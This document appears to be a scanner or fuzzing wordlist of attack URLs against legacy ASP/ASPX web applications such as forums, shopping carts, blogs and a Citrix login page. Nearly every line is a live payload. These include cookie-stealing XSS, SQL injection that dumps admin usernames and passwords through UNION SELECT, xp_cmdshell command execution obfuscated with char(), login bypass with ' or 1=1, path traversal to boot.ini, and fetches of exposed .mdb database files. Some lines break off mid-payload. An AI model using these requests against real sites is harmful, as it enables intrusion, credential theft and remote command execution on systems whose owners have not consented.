/megabbs/forums/thread-post.asp?fid=%0d%0aContent-Leng
/ScriptPath/listmain.asp?cat=<script>alert(document.cookie);</script> 
/gallery/folderview.asp?folder=Sport+Champions/../../../../../../../../winnt/repair 
/Default_.aspx?lang=1&sub=5&Page_=search&order=search&search=%27%3E%3Cscript%3Ealert%28%27Pouya_Server%27%29%3C%2Fscript%3E 
/path_to_storye/dettaglio.asp?id_doc='[SQL code]
/path_to_storye/dettaglio.asp?id_aut='[SQL code]
/DUclassmate/default.asp?iState=[SQL Inject]&nState=Florida 
/asp/detail.asp?l=&p='[sql]
/module/support/task/detail.asp?taskid='[SQL_INJECTION] 
/path/dispimage.asp?id=[SQL Injection]
/path/admin/main.asp?date=[SQL]
/forum/admin/
/UblogReload/trackback.asp?bi=[id]&btitle=[XSS]&mode=view
/UblogReload/trackback.asp?bi=343&btitle=<script>alert('document.cookie')</script>&mode=view 
/search.asp?option=simple&keywords=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&submit1=Find 
/[webwizdir]/search_form.asp?ReturnPage=Search&search=XSS&searchMode=allwords&searchIn=Topic&forum=0&searchSort=dateDESC&SearchPagePosition=1 
/articleZone.asp?example2=[XSS]
/infinicart-demo/browsesubcat.asp?catid=[sql]
/infinicart-demo/browsesubcat.asp?catid=13&subid=[sql]
/forum/forum.asp?forum_id=3&forum_title=[XSS] 
/student.asp?msg=[XSS]
/store/error.asp?message='"><script>alert(document.cookie)</script> 
/Forums/setup.asp?RC=3&MAIL=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E http
/default.asp?gb=paketayrinti&id=18+union+select+0,1,2,3,4,5,6,7+from+uye 
/search/searchresults.asp?searchField=[XSS]
/search_employees.asp?keywords=[XSS]
/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible[XSS-here]
/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[XSS-here]&Cat1Literal=Bible
/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts[XSS-here]&Cat1=839&Cat1Literal=Bible
/store/BrowseCategories.asp?Cat0=783[XSS-here]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible
/store/Search.asp?InStock=[XSS-here]&SearchType=783&strSearch=i&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1
/store/Search.asp?InStock=&SearchType=783&strSearch=[XSS-here]&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1
/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1[XSS-here]&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1
/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1[XSS-here]&PriceMin=&PriceMax=&PublicationDate=-1
/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=[XSS-here]&PriceMax=&PublicationDate=-1
/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=[XSS-here]&PublicationDate=-1
/store/AdvancedSearch.asp?strSearch=[XSS-CODE]&SearchType=-1&SearchCat1=-1&SearchCat2=-1&Author=dd&PublicationDate=-1&PriceMin=1&PriceMax=11111111&B1=Submit
/store/ViewItem.asp?ISBN=0789906651[XSS-here]&Cat0=565
/store/ViewItem.asp?ISBN=0789906651&Cat0=565[XSS-here]
/store/STWShowContent.asp?idRightPage=13032[XSS-CODE]
/store/MySide.Asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]
/store/BrowseMain.asp?Cat0=565[XSS-CODE]&Cat0Literal=Bibles&CurHigh=4
/store/BrowseMain.asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]&CurHigh=4
/store/BrowseMain.asp?Cat0=783&Cat0Literal=Gifts&CurHigh=3"><script>alert(document.cookie)</script>
/store/NewCustomer.asp?newemail=zzzz@lalala.es&RedirectURL=[XSS-CODE]
/store/Login.asp?RedirectURL=[XSS-code] 
/store/searchResults.asp?name=&idCategory=&sku='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&priceFrom=0&priceTo=9999999999&validate=1 
/[path]/dept.asp?id=[SQL]
/Calendar/details.asp?Event_ID=' 
/pc/pcadmin/editCategories.asp?nav=&lid=[id cat][sql injection]
/lookup/lookup_result.asp?domain=[XSS]&tld=.com
/agencyCatResult.asp?cmbCat='%20UPDATE%20rftCategory%20set%20Category%20=%20'Aria-Security Team';-- 
/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb 
/search.asp?search=[XSS]
/kb.asp?a=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E
/kb.asp?ID=210&a=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E 
/dUpro/Businesses/../home/search.asp?keyword=dcrab&iChannel=&#039;SQL_INJECTION
/dUpro/Classifieds/../home/search.asp?keyword=dcrab&iChannel=&#039;SQL_INJECTION
/dUpro/Events/../home/search.asp?keyword=dcrab&iChannel=&#039;SQL_INJECTION
/dUpro/events/../home/search.asp?keyword=dcrab&iChannel=&#039;SQL_INJECTION
/dUpro/Files/../home/search.asp?keyword=dcrab&iChannel=&#039;SQL_INJECTION
/dUpro/home/../home/search.asp?keyword=dcrab&iChannel=&#039;SQL_INJECTION
/dUpro/Pictures/../home/search.asp?keyword=dcrab&iChannel=&#039;SQL_INJECTION
/dUpro/polls/../polls/../home/search.asp?keyword=dcrab&iChannel=&#039;SQL_INJECTION
/dUpro/Topics/../home/search.asp?keyword=dcrab&iChannel=&#039;SQL_INJECTION
/dUpro/home/../home/search.asp?keyword=&#039;SQL_ERRORS&iChannel=
/dUpro/Topics/../home/search.asp?keyword=&#039;SQL_ERRORS&iChannel=
/listings.asp?peopleID='[sql] 
/f-google_earth.asp?itemID='[sql] 
/f-email.asp?strPeopleID=1&itemID='[sql] 
/listings.asp?strPageSize=1&strCurrentPage=1&peopleID='[sql]
/demoactivebusinessdirectory/searchadvance.asp? <= xss 
/publisher/moreinfo.asp?bookid=2&title=%3Cscript%3Ealert(document.cookie)%3C/script%3E
/products/adv_search.asp?srch_product_name=%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E&srch_product_price1=&srch_product_price2=&srch_product_stocknumber=&srch_product_category=&advance_submit=Search
/linkdirectory/search_result.asp?Category=2&keyword=%27+or+%27%3D%27&mode=date
/path/activeNews_comments.asp?articleID=[SQL INJECTION]
/requestDemo.asp?example7=[XSS] 
/export.asp?SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%
/[CustomerDefinedDir]/getpath.aspx
/default.asp?action=view1&cat=[xss]
/default.asp?action=view1&cat=40&main=[xss]
/categories.asp?catID=[SQL Injection]
/categories.asp?editorID=[SQL Injection]
/infinicart-demo/added_to_cart.asp?productid=[sql]
/[path]/cats.asp?catid=1%20%20and%201=convert(int,(select%20top%201%20username%2b'/'%2bpassword%20from%20users))--sp_password
/forgotPassword.asp?txtEmailAddress=[XSS] 
/default.asp?iCity=[SQL Injection] 
/news/news.mdb 
/midiscovery/MapFrame.asp?mapID=5&mapname=<script>
/listfull.asp?ID='[sql]
/cezanneweb/CFLookup.asp?FUNID=7302015;waitfor%20delay%20'0
/ScriptPath/listmain.asp?cat=[ SqL Code ]
/DUforum/messages.asp?FOR_ID=1;[SQL INJECT]
/elearning/search_result.asp?courses=1&course_ID=[SQL] 
/payonline.asp/strAgain=yes&CD_EmailAddress=dummy@someemailservice.com&CD_Password=&CD_AffiliateID=&CD_CardholderCountry=200&CD_ShippingCountry=200&CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&numCurrencyID=1&numItemCount=2&strItems=214;+exec+master..xp_cmdshell+'dir+c
/payonline.asp/strAgain=yes&CD_EmailAddress=dummy@someemailservice.com&CD_Password=&CD_AffiliateID=&CD_CardholderCountry=200&CD_ShippingCountry=200&CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&numCurrencyID=1&numItemCount=2&strItems=214;declare%20@a%20sysname%20set%20@a%20=%20char(100)%2bchar(105)%2bchar(114)%2bchar(32)%2bchar(99)%2bchar(58)%20exec%20master..xp_cmdshell%20@a;--z165z&strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed 
/sdccommon/verify/asp/n6plugindestructor.asp?backurl=";}</script><script src="http
/sdccommon/verify/asp/n6plugindestructor.asp?backurl=</script><script src=http
/path/activeNews_categories.asp?catID=[SQL INJECTION]
/comersus/backofficelite/comersus_supportError.asp?error=<script>alert('hi%20mum');</script>
/comersus/backofficelite/comersus_backofficelite_supportError.asp?error=<script>alert('hi%20mum');</script>
/oblog/err.asp?message=xss 
/blog/search.aspx?q="><script>alert(&#039;ImBeded%20JS&#039;)</script>
/forum.asp?FORUM_ID=42&CAT_ID=7+and+1=convert%28int,@@version%29-- 
/comment_add.asp?ID=3&email=[XSS]
/path/store/comersus_message.asp?message=<script src=http
/***/admin/main.asp
/search.asp?strSQL=[SQL Injection]
/attack1.aspx?test=%uff1cscript%uff1ealert('vulnerability')%uff1c/script%uff1e 
//fotokategori.asp?'%20union%20select%201,2,3,password,5,6,username,8%20from%20admin 
/path/activenews_view.asp?articleID=[SQL INJECTION]
/down_indir.asp?id=1+union+select+0,adminsifre,2,3,4,5,6,7+from+ayarlar 
/eshop/10expand.asp?ProductCode=' 
/produccart/pdacmin/login.asp?idadmin='' or 1=1--
/thumbnails.asp?ci=[SQL Injection]
/browse0.htm?ProductIndex=[SQL]
/upload/default.asp?mode=wrong&ERRMSG=%3Cmeta+http-equiv='Set-cookie'+content='[Cookie-Name]=[Cookie-Value]'%3E 
/path/login.asp
/DUamazonPro/shops/detail.asp?iPro=34&iSub=17[SQL Inject]
/FolderManager/FolderManager.aspx?BrowseLevel=1&BrowsePath=[SITE NORMAL PATH]\..\..\..\..\program%20files
/dUpro/Businesses/cat.asp?iCat=548&iChannel=18&nChannel=&#039;SQL_INJECTION
/dUpro/Businesses/cat.asp?iCat=548&iChannel=&#039;SQL_INJECTION&nChannel=Businesses
/dUpro/Businesses/cat.asp?iCat=&#039;SQL_INJECTION&iChannel=18&nChannel=Businesses
/dUpro/Classifieds/cat.asp?iCat=218&iChannel=7&nChannel=&#039;SQL_INJECTION
/dUpro/Classifieds/cat.asp?iCat=218&iChannel=&#039;SQL_INJECTION&nChannel=Classifieds
/dUpro/Classifieds/cat.asp?iCat=&#039;SQL_INJECTION&iChannel=7&nChannel=Classifieds
/dUpro/Events/cat.asp?iCat=248&iChannel=6&nChannel=&#039;SQL_INJECTION
/dUpro/events/cat.asp?iCat=248&iChannel=6&nChannel=&#039;SQL_INJECTION
/dUpro/Events/cat.asp?iCat=248&iChannel=&#039;SQL_INJECTION&nChannel=Events
/dUpro/events/cat.asp?iCat=248&iChannel=&#039;SQL_INJECTION&nChannel=Events
/dUpro/Events/cat.asp?iCat=&#039;SQL_INJECTION&iChannel=6&nChannel=Events
/dUpro/events/cat.asp?iCat=&#039;SQL_INJECTION&iChannel=6&nChannel=Events
/dUpro/Files/cat.asp?iCat=196&iChannel=4&nChannel=&#039;SQL_INJECTION
/dUpro/Files/cat.asp?iCat=196&iChannel=&#039;SQL_INJECTION&nChannel=Files
/dUpro/Files/cat.asp?iCat=&#039;SQL_INJECTION&iChannel=4&nChannel=Files
/dUpro/home/../Articles/cat.asp?iCat=238&iChannel=2&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Articles/cat.asp?iCat=238&iChannel=&#039;SQL_INJECTION&nChannel=Articles
/dUpro/home/../Articles/cat.asp?iCat=&#039;SQL_INJECTION&iChannel=2&nChannel=Articles
/dUpro/home/../Businesses/cat.asp?iCat=548&iChannel=18&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Businesses/cat.asp?iCat=548&iChannel=&#039;SQL_INJECTION&nChannel=Businesses
/dUpro/home/../Businesses/cat.asp?iCat=&#039;SQL_INJECTION&iChannel=18&nChannel=Businesses
/dUpro/home/../Classifieds/cat.asp?iCat=222&iChannel=7&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Classifieds/cat.asp?iCat=222&iChannel=&#039;SQL_INJECTION&nChannel=Classifieds
/dUpro/home/../Classifieds/cat.asp?iCat=&#039;SQL_INJECTION&iChannel=7&nChannel=Classifieds
/dUpro/home/../Entertainments/cat.asp?iCat=595&iChannel=19&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Entertainments/cat.asp?iCat=595&iChannel=&#039;SQL_INJECTION&nChannel=Entertainments
/dUpro/home/../Entertainments/cat.asp?iCat=&#039;SQL_INJECTION&iChannel=19&nChannel=Entertainments
/dUpro/home/../Events/cat.asp?iCat=247&iChannel=6&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Events/cat.asp?iCat=247&iChannel=&#039;SQL_INJECTION&nChannel=Events
/dUpro/home/../Events/cat.asp?iCat=&#039;SQL_INJECTION&iChannel=6&nChannel=Events
/dUpro/home/../Files/cat.asp?iCat=197&iChannel=4&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Files/cat.asp?iCat=197&iChannel=&#039;SQL_INJECTION&nChannel=Files
/dUpro/home/../Files/cat.asp?iCat=&#039;SQL_INJECTION&iChannel=4&nChannel=Files
/dUpro/home/../Links/cat.asp?iCat=6&iChannel=5&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Links/cat.asp?iCat=6&iChannel=&#039;SQL_INJECTION&nChannel=Links
/dUpro/home/../Links/cat.asp?iCat=&#039;SQL_INJECTION&iChannel=5&nChannel=Links
/dUpro/home/../News/cat.asp?iCat=250&iChannel=1&nChannel=&#039;SQL_INJECTION
/dUpro/home/../News/cat.asp?iCat=250&iChannel=&#039;SQL_INJECTION&nChannel=News
/dUpro/home/../News/cat.asp?iCat=&#039;SQL_INJECTION&iChannel=1&nChannel=News
/dUpro/home/../Pictures/cat.asp?iCat=206&iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Pictures/cat.asp?iCat=206&iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/home/../Pictures/cat.asp?iCat=&#039;SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/home/../Products/cat.asp?iCat=231&iChannel=8&nChannel=&#039;SQL_INJECTION
/dUpro/home/../Products/cat.asp?iCat=231&iChannel=&#039;SQL_INJECTION&nChannel=Products
/dUpro/home/../Products/cat.asp?iCat=&#039;SQL_INJECTION&iChannel=8&nChannel=Products
/dUpro/home/../Topics/cat.asp?iCat=465&iChannel=&#039;SQL_INJECTION&nChannel=Topics
/dUpro/home/../Topics/cat.asp?iCat=&#039;SQL_INJECTION&iChannel=16&nChannel=Topics
/dUpro/Pictures/cat.asp?iCat=206&iChannel=3&nChannel=&#039;SQL_INJECTION
/dUpro/Pictures/cat.asp?iCat=206&iChannel=&#039;SQL_INJECTION&nChannel=Pictures
/dUpro/Pictures/cat.asp?iCat=&#039;SQL_INJECTION&iChannel=3&nChannel=Pictures
/dUpro/Topics/../topics/cat.asp?iCat=483&iChannel=&#039;SQL_INJECTION&nChannel=Topics
/dUpro/Topics/../topics/cat.asp?iCat=&#039;SQL_INJECTION&iChannel=16&nChannel=Topics
/dUpro/home/../Topics/cat.asp?iCat=465&iChannel=16&nChannel=&#039;SQL_ERRORS
/dUpro/Topics/../topics/cat.asp?iCat=483&iChannel=16&nChannel=&#039;SQL_ERRORS
/midiscovery/asplib/MapPassword.asp?id=140&ps=0&Wrong=1
/store/comersus_optReviewReadExec.asp?idProduct='
//?password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253
/path/category.asp?catcode=[SQL INJECTION]
/TDizin/arama.asp?ara= "><script>alert("G3");</script>&submit=+T%27ARA+ 
/browse0.htm?ProductIndex=[XSS]
/aspmforum/forum.asp?baslik=[sql injection] 
/DUamazonPro/shops/review.asp?iSub=17&iPro=36[SQL Inject]
/[path]/viewmsg.asp?msgid=-1%20union%20select%20epass,0,0,0,email,0,0,0,0,0,0,0,0,0,0%20from%20thing+where+msgid=X
/?menukat=2%20&mod=product&cat_id=7&product_id=[SQL]
/?menukat=2%20&mod=product&cat_id=[SQL] 
/NetDemo2/OpenFile.aspx?file=../../../../../../../../boot.ini
/NetDemo2/html.aspx?file=../../../../../../../../../boot.ini
/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr';exec%20maste
/popuplargeimage.asp?strImageTag=<script>alert(document.cookie)</script>
/popuplargeimage.asp?strImageTag=<img+src="uploads/images_products_large/113.gif"%20onLoad="alert(document.cookie)"> 
/cat.asp?cat='[sql]
/Citrix/MetaFrameXP/default/login.asp?NFuse_LogoutId=Off&NFuse_MessageType=warning&NFuse_Message=%3Cscript%3Ealert(document.cookie);%3C/script%3E 
/[path]/haber.asp?haber=-999'%20union%20select%200,1,ad,3,4%20from%20Kullanici%20where%20'1
/[path]/haber.asp?haber=-999'%20union%20select%200,1,sifre,3,4%20from%20Kullanici%20where%20'1 
/AbsolutePollManager/xlaapmview.asp?p=1&msg=<script>alert("running+code+within+the+context+of+"%2bdocument.domain)</script> http
/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=&#039;SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=&#039;SQL_INJECTION
/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=&#039;SQL_INJECTION&POL_ID=75
/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=&#039;SQL_INJECTION&POL_ID=77&POL_ID=75
/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=&#039;SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=&#039;SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/Businesses/../polls/inc_vote.asp?POL_PARENT=&#039;SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/Classifieds/../polls/inc_vote.asp?POL_PARENT=&#039;SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/Events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=&#039;SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=&#039;SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/Events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=&#039;SQL_INJECTION
/dUpro/events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=&#039;SQL_INJECTION
/dUpro/Events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=&#039;SQL_INJECTION&POL_ID=75
/dUpro/events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=&#039;SQL_INJECTION&POL_ID=75
/dUpro/Events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=&#039;SQL_INJECTION&POL_ID=77&POL_ID=75
/dUpro/events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=&#039;SQL_INJECTION&POL_ID=77&POL_ID=75
/dUpro/Events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=&#039;SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=&#039;SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/Events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=&#039;SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/events/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=&#039;SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/Events/../polls/inc_vote.asp?POL_PARENT=&#039;SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/events/../polls/inc_vote.asp?POL_PARENT=&#039;SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/Files/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=&#039;SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/Files/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=&#039;SQL_INJECTION
/dUpro/Files/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=&#039;SQL_INJECTION&POL_ID=75
/dUpro/Files/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=&#039;SQL_INJECTION&POL_ID=77&POL_ID=75
/dUpro/Files/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=&#039;SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/Files/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=&#039;SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/Files/../polls/inc_vote.asp?POL_PARENT=&#039;SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/home/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=&#039;SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/home/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=&#039;SQL_INJECTION
/dUpro/home/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=&#039;SQL_INJECTION&POL_ID=75
/dUpro/home/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=&#039;SQL_INJECTION&POL_ID=77&POL_ID=75
/dUpro/home/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=&#039;SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/home/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=&#039;SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/home/../polls/inc_vote.asp?POL_PARENT=&#039;SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=&#039;SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=&#039;SQL_INJECTION
/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=&#039;SQL_INJECTION&POL_ID=75
/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=&#039;SQL_INJECTION&POL_ID=77&POL_ID=75
/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=&#039;SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=&#039;SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/Pictures/../polls/inc_vote.asp?POL_PARENT=&#039;SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=&#039;SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=&#039;SQL_INJECTION
/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=&#039;SQL_INJECTION&POL_ID=75
/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=&#039;SQL_INJECTION&POL_ID=77&POL_ID=75
/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=&#039;SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=&#039;SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/polls/../polls/../polls/inc_vote.asp?POL_PARENT=&#039;SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=&#039;SQL_INJECTION&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=&#039;SQL_INJECTION
/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=&#039;SQL_INJECTION&POL_ID=75
/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=&#039;SQL_INJECTION&POL_ID=77&POL_ID=75
/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=254&CHA_ID=&#039;SQL_INJECTION&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT=74&POL_CATEGORY=&#039;SQL_INJECTION&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/dUpro/Topics/../polls/inc_vote.asp?POL_PARENT=&#039;SQL_INJECTION&POL_CATEGORY=254&CHA_ID=15&CHA_NAME=Polls&POL_ID=76&POL_ID=77&POL_ID=75
/login.asp?ret_page=[XSS] 
/admin/hosting/resellerresources.asp?action=2&jresourceid=1%20or%201=1 
/path/tournaments.asp?tournament_id=[SQL INJECTION]
/forum/admin/wwforum.mdb 
/[CustomerDefinedDir]/pages/?a=1&template=%3Cscript%3Ealert(2)%3C/script%3E
/activeauctionsuperstore/watchthisitem.asp?itemid=">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&amp%3baccountid= 
/searchkey.asp?Keyword=[xss]
/[path]/members.asp?SF="><script>alert(1);</script>
/user/control.asp">
/path/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings 
/news_sort.asp?filter='[SQL]
/Forums-Path/Logon.aspx?SessionID=[xss]
/pc/pcadmin/modCustomCardPaymentOpt.asp?mode=Edit&idc=[page][sqlinjection]&id=[id]&gwCode=[code]
/aspbb/forum.asp?FORUM_ID=[sql injection]
